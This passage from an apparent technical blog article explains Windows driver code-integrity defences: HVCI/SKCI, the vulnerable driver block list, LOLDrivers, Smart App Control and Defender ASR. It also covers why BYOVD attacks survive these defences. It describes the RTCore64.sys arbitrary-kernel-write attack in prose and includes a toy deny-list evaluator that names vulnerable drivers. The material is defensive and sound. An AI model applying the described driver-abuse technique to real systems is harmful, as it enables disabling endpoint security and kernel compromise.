&lt;p&gt;The Code Integrity engine on an HVCI-on machine -- signature verification and policy-file consultation -- runs inside VTL1&apos;s Secure Kernel as the &lt;em&gt;Secure Kernel Code Integrity&lt;/em&gt; component, SKCI. The VTL0 kernel cannot read or write VTL1 memory by hardware construction: the hypervisor&apos;s second-level address translation tables, programmed before VTL0 ever runs, mark VTL1 pages as unreachable from VTL0. The in-memory &lt;code&gt;g_CiOptions&lt;/code&gt; state continues to reside in &lt;code&gt;ci.dll&lt;/code&gt;&apos;s VTL0 data section -- it does not relocate into VTL1 -- but on an HVCI-on machine Kernel Data Protection (KDP), exposed to VTL0 drivers as &lt;code&gt;MmProtectDriverSection&lt;/code&gt;, asks the Secure Kernel to mark the containing page read-only at the SLAT level. A fully compromised VTL0 kernel -- with kernel debugging attached, with all of ring zero&apos;s privileges -- cannot rewrite &lt;code&gt;g_CiOptions&lt;/code&gt; to zero, because the SLAT mapping refuses the write.&lt;/p&gt;

flowchart TD
    subgraph VTL1 [VTL1 -- Secure Kernel]
        SK[Secure Kernel]
        SKCI[SKCI -- Code Integrity]
        Policy[&quot;Code Integrity policy&lt;br /&gt;(DriverSiPolicy.p7b)&quot;]
        SK --&amp;gt; SKCI
        SKCI --&amp;gt; Policy
    end
    subgraph VTL0 [VTL0 -- Normal Windows]
        Kern[NT Kernel]
        Drv[Driver attempting load]
        CI[ci.dll user-side]
        Kern --&amp;gt; CI
        CI --&amp;gt; Drv
    end
    Hypervisor{&quot;Hyper-V SLAT&quot;}
    Kern --&amp;gt;|&quot;Section create&quot;| Hypervisor
    Hypervisor --&amp;gt;|&quot;Forward&quot;| SKCI
    SKCI --&amp;gt;|&quot;Allow or deny&quot;| Hypervisor
    Hypervisor --&amp;gt;|&quot;Result&quot;| Kern
&lt;h3&gt;W^X on kernel memory&lt;/h3&gt;
&lt;p&gt;There is a second, equally structural property HVCI enforces. When the VTL0 kernel tries to map an executable section -- to create a kernel-executable page from a PE image -- the hypervisor forces the request through SKCI. SKCI verifies the Authenticode signature &lt;em&gt;at section creation time&lt;/em&gt;, not only at the driver-load entry point (&lt;code&gt;IopLoadDriver&lt;/code&gt; / &lt;code&gt;MmLoadSystemImage&lt;/code&gt;) a load goes through later [@ms-hvci-vbs]. And SKCI refuses any page that is simultaneously writable and executable. The classic exploitation technique of allocating a writable kernel buffer, writing shellcode into it, and then jumping to it stops working: the page either is writable, in which case it is not executable, or is executable, in which case it is not writable.&lt;/p&gt;
&lt;p&gt;The hardware acceleration matters. The Memory Integrity page [@ms-hvci-vbs] is unusually direct about the requirement: &quot;Memory integrity works better with Intel Kabylake and higher processors with Mode-Based Execution Control, and AMD Zen 2 and higher processors with Guest Mode Execute Trap capabilities. Older processors rely on an emulation of these features, called Restricted User Mode, and will have a bigger impact on performance.&quot; [@ms-hvci-vbs]Mode-Based Execute Control (MBEC) is the Intel feature that lets the hypervisor distinguish &quot;executable in supervisor mode&quot; from &quot;executable in user mode&quot; at the page-table-entry level. AMD&apos;s Guest Mode Execute Trap (GMET) is the structurally equivalent feature. Older silicon falls back to Restricted User Mode emulation, which works correctly but pays a meaningfully larger performance tax. The hardware cutoff is a major reason HVCI defaulted off on pre-2017 OEM hardware for years.&lt;/p&gt;
&lt;h3&gt;What HVCI fixed&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;g_CiOptions&lt;/code&gt; patching family, the third bypass we met in section 4, closes on HVCI-on systems. TrustedSec&apos;s post [@trustedsec-gcioptions] gives a clean account: &lt;code&gt;g_CiOptions&lt;/code&gt; still lives in &lt;code&gt;ci.dll&lt;/code&gt;&apos;s VTL0 data section, but Kernel Data Protection -- exposed to VTL0 drivers as &lt;code&gt;MmProtectDriverSection&lt;/code&gt; -- asks the Secure Kernel in VTL1 to mark its containing page read-only at the SLAT level, so a VTL0 ring-zero write to it faults; the VTL0 kernel cannot rewrite the variable; live-kernel debuggers attached to VTL0 cannot rewrite it either [@trustedsec-gcioptions]. The arbitrary-write-to-disable-DSE pattern that worked on Windows 7 through pre-HVCI Windows 10 is, on an HVCI-on Windows 11, no longer a primitive that exists in the attacker&apos;s threat model. The trust domain that decides the policy is not the trust domain the attacker can reach.&lt;/p&gt;
&lt;h3&gt;What HVCI did not fix&lt;/h3&gt;
&lt;p&gt;It is essential to be clear about what HVCI does not catch, because misreading this is how the BYOVD class survives.&lt;/p&gt;
&lt;p&gt;HVCI verifies the &lt;em&gt;signature&lt;/em&gt; and enforces W^X. It does not analyse the driver&apos;s &lt;em&gt;behaviour&lt;/em&gt;. The 2019 &lt;code&gt;RTCore64.sys&lt;/code&gt; driver passes SKCI section-mapping unchanged: it is signed by MSI through a Microsoft-recognised chain, it has no writable-and-executable pages, and the Authenticode hash on disk matches the binary in memory. After it loads, an attacker in user mode sends an IOCTL; the driver, executing legitimately in ring zero, writes attacker-controlled bytes to an attacker-chosen kernel address; the EDR notify routine table is patched; the BYOVD attack proceeds. Everything that happens inside the IOCTL handler happens with kernel privilege, on properly-signed code paths, inside HVCI&apos;s W^X policy. The structural BYOVD class is unaffected.&lt;/p&gt;
&lt;p&gt;That is the gap the next two sections close.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Memory Integrity page [@ms-hvci-vbs] is explicit that &quot;some applications and hardware device drivers may be incompatible with memory integrity. This incompatibility can cause devices or software to malfunction and in rare cases may result in a boot failure (blue screen).&quot; [@ms-hvci-vbs] For years OEM and gaming-system vendors shipped with HVCI off because legacy ISV drivers, anti-cheat kernel components, or older virtualisation tools could not coexist with it. On an HVCI-off system the &lt;code&gt;g_CiOptions&lt;/code&gt; patching family is back in play, the kernel-CI engine and the kernel it polices are in the same trust domain, and the analysis of section 4 applies unchanged. The 2026 default-on baseline is real, but it is not yet universal.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;HVCI is the answer to &lt;em&gt;who decides&lt;/em&gt;. It is not the answer to &lt;em&gt;what gets decided&lt;/em&gt;. We still need a way to say: this specific signed binary is one we do not trust.&lt;/p&gt;
&lt;h2&gt;7. The Block List: Naming the Weakness (2018-present)&lt;/h2&gt;
&lt;p&gt;Beginning with Windows 10 1809 (October 2018), Microsoft started shipping something it had spent twenty-five years avoiding: a list of specific drivers it would refuse to load by name.&lt;/p&gt;
&lt;p&gt;The artefact lives at &lt;code&gt;%windir%\system32\CodeIntegrity\DriverSiPolicy.p7b&lt;/code&gt;. The file is a PKCS#7-signed &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;App Control for Business&lt;/a&gt; policy -- &quot;WDAC&quot; by its former name -- whose body consists of deny rules expressed at the granularity of file hash, file name, or publisher. The canonical Microsoft-recommended driver block rules page [@ms-driver-block-rules] is the primary source, and is unusually rich for a Microsoft Learn page [@ms-driver-block-rules].&lt;/p&gt;

Microsoft&apos;s policy-driven application-control engine. An App Control policy is a signed XML or binary file that lists allow rules, deny rules, and signer-level rules; at load time, the policy engine consults the rules and either allows or refuses the image. `DriverSiPolicy.p7b` is itself an App Control policy whose body is all deny rules.
&lt;h3&gt;Cadence and the published-vs-shipped gap&lt;/h3&gt;
&lt;p&gt;The block list is refreshed on two cadences. Microsoft publishes the source XML on the block-rules page [@ms-driver-block-rules] on a quarterly schedule and pushes the binary &lt;code&gt;DriverSiPolicy.p7b&lt;/code&gt; to client devices through monthly Windows servicing [@ms-driver-block-rules]. Microsoft&apos;s Security Baselines team also publishes a running update post [@ms-tc-blocklist-baselines] cataloguing the changes [@ms-tc-blocklist-baselines].&lt;/p&gt;
&lt;p&gt;The candid admission on the block-rules page [@ms-driver-block-rules] is the part of the story that is most worth understanding.&lt;/p&gt;

The blocklist included in this article and in the associated downloadable files usually contains a more complete set of known vulnerable drivers than the version in the OS and delivered by Windows Update. It&apos;s often necessary for us to hold back some blocks to avoid breaking existing functionality. -- Microsoft Learn, *Microsoft-recommended driver block rules* [@ms-driver-block-rules]
&lt;p&gt;The published list is, on purpose, more inclusive than the shipped list. The reason is operational: every entry in the shipped list is a driver that would refuse to load on millions of devices, some of which have legitimate dependencies. Microsoft holds entries back when the compatibility cost is too high, even when the security signal is strong. We will come back to whether that gap is closeable in section 9.&lt;/p&gt;
&lt;h3&gt;The 22H2 cut and the Server 2016 carve-out&lt;/h3&gt;
&lt;p&gt;Two dates anchor the deployment story.&lt;/p&gt;
&lt;p&gt;The block list was an &lt;em&gt;optional&lt;/em&gt; feature in Windows 10 1809, enabled by default only on systems that ran Hypervisor-protected Code Integrity, Smart App Control, or Windows in S-mode [@ms-kb5020779] [@ms-kb5020779]. With the Windows 11 2022 Update, also known as 22H2 [@ms-blogs-win11-2022], released on 20 September 2022, default-on coverage extended to every client device, not just the HVCI-on subset [@ms-blogs-win11-2022]. The 22H2 release is the moment the block list became universal Windows client behaviour, six years after the first BYOVD primitive that motivated it.&lt;/p&gt;
&lt;p&gt;The block-rules page [@ms-driver-block-rules] notes a single explicit carve-out worth flagging.&quot;Except on Windows Server 2016, the vulnerable driver blocklist is also enforced when either memory integrity (also known as hypervisor-protected code integrity or HVCI), Smart App Control, or S mode is active.&quot; [@ms-driver-block-rules] Windows Server 2016 does not get the default-on block list even when HVCI is on. An enterprise admin managing Server 2016 has to deploy an explicit App Control policy to get the same coverage. The October 2022 preview cycle saw a documented quirk -- KB5020779 [@ms-kb5020779] explains that a preview release shipped without an actual blocklist refresh, addressed by a subsequent servicing update [@ms-kb5020779].The KB5020779 episode is a useful reminder that the in-box block list ships through the same Windows Update cycle as everything else. Preview releases do not always carry a fresh policy, and the cadence on the block-rules page [@ms-driver-block-rules] describes the intended steady state rather than every individual update [@ms-driver-block-rules].&lt;/p&gt;
&lt;h3&gt;Naming the weakness, not the publisher&lt;/h3&gt;
&lt;p&gt;For the first time in the story, the question Windows asks at load time is not only &lt;em&gt;who signed this binary?&lt;/em&gt; but also &lt;em&gt;is this specific signed binary one we have learned is unsafe?&lt;/em&gt; The block list is a step the previous generations could not have taken with the primitives they had: it requires a deny list that can be authored after the fact, distributed quickly, and enforced inside a trust domain the attacker cannot reach. KMCS supplied the load-time enforcement primitive; HVCI supplied the immune-from-VTL0 enforcement context; only with both in place could &lt;code&gt;DriverSiPolicy.p7b&lt;/code&gt; actually do its job.&lt;/p&gt;

flowchart TD
    A[Driver image requested for load] --&amp;gt; B[Hypervisor mediates section create]
    B --&amp;gt; C[SKCI verifies Authenticode chain]
    C --&amp;gt; D{&quot;Chain OK?&quot;}
    D -- &quot;No&quot; --&amp;gt; X[Refuse]
    D -- &quot;Yes&quot; --&amp;gt; E[Consult DriverSiPolicy.p7b deny rules]
    E --&amp;gt; F{&quot;Hash, name, or signer on deny list?&quot;}
    F -- &quot;Yes&quot; --&amp;gt; X
    F -- &quot;No&quot; --&amp;gt; G[Allow section creation]
    G --&amp;gt; H[Driver maps into kernel address space]
&lt;h3&gt;The Vulnerable &amp;amp; Malicious Driver Reporting Center&lt;/h3&gt;
&lt;p&gt;The block list grew faster after Microsoft built a structured channel to feed it. The December 2021 Microsoft Security blog post [@ms-vdrc-blog] announced the Vulnerable &amp;amp; Malicious Driver Reporting Center: a portal where researchers and vendors can submit kernel drivers for evaluation, backed by an automated analysis pipeline that looks for the BYOVD primitives -- &quot;the ability to read or write arbitrary kernel, physical, or device memory, including Port I/O and central processing unit (CPU) registers from user mode.&quot; [@ms-vdrc-blog] The post explicitly lists the historical CVE backdrop that motivated the centre, naming RobinHood, Uroburos, Derusbi, GrayFish, and Sauron as families that leveraged driver vulnerabilities such as CVE-2008-3431, CVE-2013-3956, CVE-2009-0824, and CVE-2010-1592 [@ms-vdrc-blog].&lt;/p&gt;
&lt;p&gt;The same post anchors the EV-certificate publisher requirement and the HLK or attestation gating that produces the block list&apos;s inputs in the first place. The reporting centre is the path by which a flagged driver moves from &quot;spotted in research&quot; to &quot;deny rule in the next quarterly XML push&quot;.&lt;/p&gt;
&lt;h3&gt;Defender ASR as the HVCI-off coverage path&lt;/h3&gt;
&lt;p&gt;There is a third surface worth knowing about. Microsoft&apos;s Attack Surface Reduction rules [@ms-asr-rules] include &quot;Block abuse of exploited vulnerable signed drivers&quot; (&lt;code&gt;56a863a9-875e-4185-98a7-b882c64b5ce5&lt;/code&gt;) as part of the standard ASR protection set [@ms-asr-rules]. For Microsoft Defender for Endpoint customers on Windows 10 E3 or E5, the rule covers machines where HVCI is not on. Microsoft notes that &quot;the same blocklist is also used by Microsoft Defender Antivirus customers&quot; via the ASR rule [@ms-vdrc-blog]. The path is narrower than HVCI-rooted enforcement -- Defender has to be running, the rule has to be enabled -- but it extends the block list to enterprise environments that have not yet flipped HVCI on.&lt;/p&gt;
&lt;h3&gt;LOLDrivers and the dual-use externality&lt;/h3&gt;
&lt;p&gt;The block list is not the only catalogue of vulnerable Windows drivers. The community-maintained LOLDrivers project [@loldrivers-io] -- &quot;Living Off The Land Drivers&quot; -- collects vulnerable, malicious, and known-malicious Windows drivers in one place. Every entry carries YAML metadata and where possible YARA, Sigma, ClamAV, and Sysmon rules, plus a pre-compiled App Control deny policy that can be deployed standalone [@gh-loldrivers] [@loldrivers-io]. As of the source verification for this article, LOLDrivers carried approximately 2,132 driver entries -- considerably more than the Microsoft-shipped list.&lt;/p&gt;
&lt;p&gt;Check Point Research called out the dual-use problem in their 2024 piece [@cpr-byovd]: a public catalogue of vulnerable drivers is also a reading list for attackers. The same researchers ran the methodology in reverse: &quot;we conducted a mass hunt for new drivers that may be vulnerable, uncovering thousands of potentially at-risk drivers.&quot; [@cpr-byovd] Defenders use the list for hardening; attackers use it for shopping. Both effects are real.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Defenders who can tolerate compatibility risk can compile the source XML from the block-rules page [@ms-driver-block-rules] into an App Control policy and deploy it directly, picking up the entries Microsoft holds back from the in-box list. Optionally layer the LOLDrivers App Control policy [@gh-loldrivers] on top for community-curated coverage. Test in audit mode first -- both lists are more aggressive than the shipped baseline and may flag drivers your environment depends on [@ms-driver-block-rules] [@gh-loldrivers].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;A WDAC rule evaluator, in miniature&lt;/h3&gt;
&lt;p&gt;The semantics of an App Control policy are simple enough to model in a few lines. Deny rules win; allow rules are consulted next; the default action handles whatever is left.&lt;/p&gt;
&lt;p&gt;{`
// Simplified model of the App Control / WDAC rule-evaluation engine.
// Deny rules win, allow rules permit the remainder, and an explicit
// default action handles images neither denied nor allowed.&lt;/p&gt;
&lt;p&gt;const policy = {
  denyByHash:    new Set([&quot;c1d5cf8c43e7679b782630e93f5e6420ca1749a7&quot;]), // Capcom.sys
  denyByName:    new Set([&quot;RTCore64.sys&quot;]),
  denyBySigner:  new Set([&quot;CN=Some Compromised Publisher, O=Example&quot;]),
  allowBySigner: new Set([&quot;CN=Microsoft Windows, O=Microsoft Corporation&quot;]),
  defaultAction: &quot;BLOCK&quot;,
};&lt;/p&gt;
&lt;p&gt;function evaluate(image, policy) {
  if (policy.denyByHash.has(image.sha1)) return &quot;BLOCK (hash on deny list)&quot;;
  if (policy.denyByName.has(image.fileName)) return &quot;BLOCK (name on deny list)&quot;;
  if (policy.denyBySigner.has(image.signer)) return &quot;BLOCK (signer on deny list)&quot;;
  if (policy.allowBySigner.has(image.signer)) return &quot;ALLOW (signer on allow list)&quot;;
  return policy.defaultAction === &quot;ALLOW&quot;
    ? &quot;ALLOW (default)&quot;
    : &quot;BLOCK (default)&quot;;
}&lt;/p&gt;
&lt;p&gt;const cases = [
  { sha1: &quot;c1d5cf8c43e7679b782630e93f5e6420ca1749a7&quot;, fileName: &quot;Capcom.sys&quot;,
    signer: &quot;CN=CAPCOM Co., Ltd.&quot; },
  { sha1: &quot;0000000000000000000000000000000000000000&quot;, fileName: &quot;RTCore64.sys&quot;,
    signer: &quot;CN=Micro-Star International Co., Ltd.&quot; },
  { sha1: &quot;1111111111111111111111111111111111111111&quot;, fileName: &quot;ntfs.sys&quot;,
    signer: &quot;CN=Microsoft Windows, O=Microsoft Corporation&quot; },
];
for (const c of cases) console.log(c.fileName, &quot;-&amp;gt;&quot;, evaluate(c, policy));
`}&lt;/p&gt;
&lt;p&gt;Naming the weakness is genuinely new. But the list only ever lists what someone has already found. The window between disclosure and enforcement is months, and Microsoft documents that the shipped list is by design weaker than the published one. What gets the rest of the way?&lt;/p&gt;
&lt;h2&gt;8. The 2026 Stack: Defence in Depth Made Concrete&lt;/h2&gt;
&lt;p&gt;On a default-configured Windows 11 22H2 machine in 2026, a kernel driver that tries to load passes through five distinct gates. Each one closes a blind spot the previous one cannot reach.&lt;/p&gt;
&lt;p&gt;The order matters, and so do the dependencies. The gates are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Kernel-Mode Code Signing.&lt;/strong&gt; The Authenticode chain must terminate at a Microsoft-owned root. The chain check rejects unsigned drivers and drivers chained to non-Microsoft roots, except under the documented grandfathering carve-outs [@ms-kmcs-policy] [@ms-kmcs-policy].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The Vulnerable Driver Block List.&lt;/strong&gt; SKCI consults &lt;code&gt;DriverSiPolicy.p7b&lt;/code&gt; for hash, file-name, and signer-level deny rules. The list is default-on for every client device since Windows 11 22H2 [@ms-blogs-win11-2022], and is updated quarterly through Microsoft Learn&apos;s published source XML and monthly through Windows servicing [@ms-driver-block-rules] [@ms-blogs-win11-2022].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;HVCI / SKCI.&lt;/strong&gt; The Code Integrity engine runs in VTL1, verifies signatures at section-mapping time rather than only at &lt;code&gt;IoLoadDriver&lt;/code&gt;, and enforces W^X on kernel memory. The policy engine is structurally out of reach of a fully compromised VTL0 kernel [@ms-hvci-vbs].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;App Control / Smart App Control.&lt;/strong&gt; Enterprise admins author explicit App Control allowlists; consumer devices on clean Windows 11 installs run Smart App Control [@ms-sac-faq], a Microsoft-authored allowlist policy backed by cloud reputation [@ms-sac-faq] [@ms-appcontrol].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Defender ASR.&lt;/strong&gt; On Microsoft Defender for Endpoint deployments, the &quot;Block abuse of exploited vulnerable signed drivers&quot; ASR rule extends block-list coverage to HVCI-off environments [@ms-asr-rules].&lt;/li&gt;
&lt;/ol&gt;

The Windows 11 22H2+ consumer-facing front end for App Control for Business. SAC enforces a Microsoft-authored policy and supplements it with cloud reputation lookups from the Intelligent Security Graph. SAC is only available on clean installs and is shipped in evaluation mode by default; once turned on, it also unconditionally enforces the vulnerable driver block list [@ms-sac-faq].

The cloud-backed reputation service that Smart App Control consults to predict whether a given binary is safe. When confident, ISG approves the binary; when unconfident, SAC falls back to signature checks; absent both, the binary is blocked [@ms-sac-faq].
&lt;h3&gt;Orthogonality, not redundancy&lt;/h3&gt;
&lt;p&gt;The five gates look redundant from a distance. They are not. Each closes a class of failure the others cannot reach. The orthogonality is the reason for the stack.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Gate&lt;/th&gt;
&lt;th&gt;Catches&lt;/th&gt;
&lt;th&gt;Misses&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;KMCS&lt;/td&gt;
&lt;td&gt;Unsigned and cross-cert-only-signed drivers&lt;/td&gt;
&lt;td&gt;Signed-but-vulnerable drivers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block list&lt;/td&gt;
&lt;td&gt;Known-vulnerable signed drivers (post-disclosure)&lt;/td&gt;
&lt;td&gt;Unknown-vulnerable signed drivers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HVCI / SKCI&lt;/td&gt;
&lt;td&gt;&lt;code&gt;g_CiOptions&lt;/code&gt;-patching from VTL0; writable+executable kernel pages&lt;/td&gt;
&lt;td&gt;Behavioural BYOVD inside a properly-signed driver&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WDAC / SAC&lt;/td&gt;
&lt;td&gt;Anything not on the allowlist (enterprise) or unknown-reputation (consumer)&lt;/td&gt;
&lt;td&gt;Allowlisted drivers with unknown defects&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defender ASR&lt;/td&gt;
&lt;td&gt;Block-list entries on HVCI-off machines (where the rule is enabled)&lt;/td&gt;
&lt;td&gt;Drivers not on Microsoft&apos;s blocklist&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The matrix is the practical justification for the stack. If &lt;code&gt;DriverSiPolicy.p7b&lt;/code&gt; had perfect coverage there would be no need for SAC; if SAC had a complete allowlist there would be no need for the block list; if HVCI proved driver safety rather than driver identity there would be no need for either. None of those preconditions hold, and section 9 explains why they cannot.&lt;/p&gt;
&lt;h3&gt;Smart App Control&apos;s particulars&lt;/h3&gt;
&lt;p&gt;SAC merits a few specifics because its behaviour differs from the rest of the stack in ways that surprise readers. First, it is consumer-facing and only available on clean Windows 11 installs -- an upgrade does not get SAC. Second, SAC ships in &lt;em&gt;evaluation mode&lt;/em&gt; by default. Windows watches user behaviour, and if the user mostly runs cloud-reputable software, SAC quietly flips to &lt;em&gt;enforce&lt;/em&gt;; if the user runs a lot of niche or self-developed software, SAC quietly flips to &lt;em&gt;off&lt;/em&gt;. Third, until a 2024 servicing change [@ms-sac-faq] made SAC re-enableable from Windows Security, turning SAC off used to require a clean install to bring it back [@ms-sac-faq]. Fourth, on enterprise-managed devices, SAC turns itself off automatically after 48 hours; managed environments are expected to deploy WDAC instead [@ms-appcontrol].&lt;/p&gt;
&lt;p&gt;The cold-start failure mode is worth knowing. A small independent hardware vendor whose driver has never been seen at scale lacks a cloud reputation when SAC asks about it. The fallback is signature, but a signed driver from an unknown publisher does not always clear SAC&apos;s confidence threshold. Small IHVs occasionally find their drivers blocked on consumer hardware running SAC for that reason alone.&lt;/p&gt;

flowchart TD
    A[Driver image requested] --&amp;gt; B[Gate 1: KMCS Authenticode chain]
    B --&amp;gt; C{&quot;Microsoft-rooted?&quot;}
    C -- &quot;No&quot; --&amp;gt; X[Refuse]
    C -- &quot;Yes&quot; --&amp;gt; D[Gate 2: DriverSiPolicy.p7b]
    D --&amp;gt; E{&quot;On block list?&quot;}
    E -- &quot;Yes&quot; --&amp;gt; X
    E -- &quot;No&quot; --&amp;gt; F[Gate 3: HVCI / SKCI section mapping]
    F --&amp;gt; G{&quot;Signature OK, W^X satisfied?&quot;}
    G -- &quot;No&quot; --&amp;gt; X
    G -- &quot;Yes&quot; --&amp;gt; H[Gate 4: App Control / SAC]
    H --&amp;gt; I{&quot;On allowlist or reputable?&quot;}
    I -- &quot;No&quot; --&amp;gt; X
    I -- &quot;Yes&quot; --&amp;gt; J[Gate 5: Defender ASR rule applicable]
    J --&amp;gt; K[Driver loads into VTL0 kernel]
&lt;h3&gt;Verifying what the machine actually does&lt;/h3&gt;
&lt;p&gt;The state of the stack on any given Windows machine is observable. The Win32_DeviceGuard WMI class exposes a &lt;code&gt;SecurityServicesRunning&lt;/code&gt; array whose integer codes name the security services currently active. The aside below covers the practitioner-facing details.&lt;/p&gt;

Two commands answer most of the question. From an elevated PowerShell prompt, `Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard` returns a structure whose `SecurityServicesRunning` array enumerates the services in operation; a value of **1** indicates **Credential Guard**, a value of **2** indicates **HVCI / Memory Integrity**, and additional values cover newer services (System Guard Secure Launch, SMM Firmware Measurement, Kernel-mode Hardware-enforced Stack Protection, and Hypervisor-Enforced Paging Translation) [@ms-hvci-vbs]. `bcdedit /enum {default}` shows whether `hypervisorlaunchtype` is set to `Auto`, the prerequisite for VBS being on at all. The block list file itself lives at `%windir%\system32\CodeIntegrity\DriverSiPolicy.p7b`; if it is missing, the in-box list is not deployed on that machine. None of these tell you whether your Defender ASR rule is active without a separate `Get-MpPreference` check.
&lt;p&gt;A toy decoder helps make the WMI surface concrete.&lt;/p&gt;
&lt;p&gt;{`
// Mirror of the integer codes the Win32_DeviceGuard WMI class reports
// for SecurityServicesRunning. Documented on Microsoft Learn under
// the Memory Integrity / HVCI guidance.&lt;/p&gt;
&lt;p&gt;const SERVICE_NAMES = {
  1: &quot;Credential Guard&quot;,
  2: &quot;Hypervisor-protected Code Integrity (HVCI / Memory Integrity)&quot;,
  3: &quot;System Guard Secure Launch&quot;,
  4: &quot;SMM Firmware Measurement&quot;,
  5: &quot;Kernel-mode Hardware-enforced Stack Protection&quot;,
  6: &quot;Kernel-mode Hardware-enforced Stack Protection (Audit mode)&quot;,
  7: &quot;Hypervisor-Enforced Paging Translation&quot;,
};&lt;/p&gt;
&lt;p&gt;function explain(servicesRunning) {
  if (!servicesRunning.length) {
    return &quot;No VBS-rooted security services are running on this device.&quot;;
  }
  return servicesRunning
    .map((code) =&amp;gt; SERVICE_NAMES[code] || (&quot;unknown service &quot; + code))
    .map((s) =&amp;gt; &quot;  - &quot; + s)
    .join(&quot;\n&quot;);
}&lt;/p&gt;
&lt;p&gt;console.log(&quot;Sample 1: HVCI on, Credential Guard on&quot;);
console.log(explain([1, 2]));
console.log(&quot;\nSample 2: nothing running&quot;);
console.log(explain([]));
console.log(&quot;\nSample 3: full stack on a Secured-core PC&quot;);
console.log(explain([1, 2, 3, 4, 5]));
`}&lt;/p&gt;
&lt;p&gt;Five gates is a lot of work to do what one ideal gate could not. The reason for the inflation is uncomfortable: the one ideal gate cannot, in principle, exist.&lt;/p&gt;
&lt;h2&gt;9. The Undecidability Wall&lt;/h2&gt;
&lt;p&gt;Why does Windows need five layers to do what one perfect signature ought to do? Because the perfect signature is mathematically impossible.&lt;/p&gt;
&lt;p&gt;The third reframe of this article is the one that turns engineering frustration into theoretical inevitability. The property of interest -- &quot;this signed driver, when exercised through its IOCTL surface, can be coerced into giving an attacker an arbitrary kernel-write primitive&quot; -- is a non-trivial semantic property of the driver&apos;s program text. Rice&apos;s theorem says that for any non-trivial semantic property of programs, the predicate is undecidable on the class of all programs. No algorithm exists that, in finite time, answers correctly for every input.&lt;/p&gt;
&lt;p&gt;A useful way to state the bound: if $P$ is the set of all kernel drivers and $\text{Unsafe}(p) = 1$ iff driver $p$ exposes a kernel-write primitive through its IOCTL handler, then no total computable function $f: P \to {0, 1}$ satisfies $f = \text{Unsafe}$. Every approximation either over-blocks ($f(p) = 1$ when $\text{Unsafe}(p) = 0$, false positives, broken drivers) or under-blocks ($f(p) = 0$ when $\text{Unsafe}(p) = 1$, false negatives, BYOVD in the wild). The signing pipeline scans for the obvious cases; sophisticated dynamic analysers will catch more of the not-obvious cases; but the unrestricted version of the problem has no complete solution.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Whether an arbitrary signed driver can be coerced into giving an attacker a kernel-write primitive is undecidable. No static signing scheme can ever block exactly the unsafe drivers. The Windows answer is therefore not a single perfect gate; it is defence in depth that narrows, but does not close, the gap.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Microsoft&apos;s formal acknowledgement&lt;/h3&gt;
&lt;p&gt;Microsoft has been formally clear about a related point for years: the administrator-to-kernel transition is not, in the MSRC servicing-criteria [@elastic-admin] sense, a security boundary [@elastic-admin]. Elastic Security Labs put the position in plain English: &quot;the blocklist&apos;s deployment model can be slow to adapt to new threats, with updates automatically deployed typically only once or twice a year. Users can manually update their blocklists, but such interventions bring us out of &apos;secure by default&apos; territory ... When determining which vulnerabilities to fix, the Microsoft Security Response Center (MSRC) uses the concept of a security boundary.&quot; [@elastic-admin]&lt;/p&gt;

Administrator-to-kernel is not a security boundary, in the MSRC servicing-criteria sense. The defence-in-depth mechanisms described here mitigate it; from the impossibility result, none can close it.
&lt;p&gt;The MSRC framing is engineering policy. The undecidability result is theoretical inevitability. They land in the same place: an attacker who has administrator privilege, who can pick from the entire history of signed Windows drivers, who is patient, is not stopped by any number of signature checks. The defence-in-depth mechanisms make the attacker work harder; they raise the cost; they shrink the surface of viable signed drivers. They do not close the structural gap.&lt;/p&gt;
&lt;h3&gt;Closeable gaps and irreducible gaps&lt;/h3&gt;
&lt;p&gt;It is worth separating two kinds of gap.&lt;/p&gt;
&lt;p&gt;The published-vs-shipped block list gap is a &lt;em&gt;policy&lt;/em&gt; decision, not an engineering limit. Microsoft documents that &quot;it&apos;s often necessary for us to hold back some blocks to avoid breaking existing functionality.&quot; [@ms-driver-block-rules]The published-vs-shipped gap is the closeable part. An administrator who can author or import an App Control policy can deploy the published XML directly and pick up Microsoft&apos;s full curation. The irreducible part of the gap sits behind it: even the published list lists only what someone has already disclosed. The undecidability result applies to &lt;em&gt;finding&lt;/em&gt; unsafe drivers, not to &lt;em&gt;listing&lt;/em&gt; known-unsafe ones. Defenders willing to accept compatibility risk can close it on their own machines today.&lt;/p&gt;
&lt;p&gt;The gap that cannot close is the one between the published list and the universe of vulnerable drivers Microsoft has not yet learned about. That is where the undecidability result bites. No amount of pipeline tightening eliminates the class of design flaws whose recognition requires understanding what the driver&apos;s IOCTL handler will do under all possible inputs.&lt;/p&gt;
&lt;h3&gt;What static methods &lt;em&gt;can&lt;/em&gt; achieve&lt;/h3&gt;
&lt;p&gt;Quantifying what the existing layers achieve is more useful than lamenting what they cannot. The complexity bounds for each layer are well-defined.&lt;/p&gt;
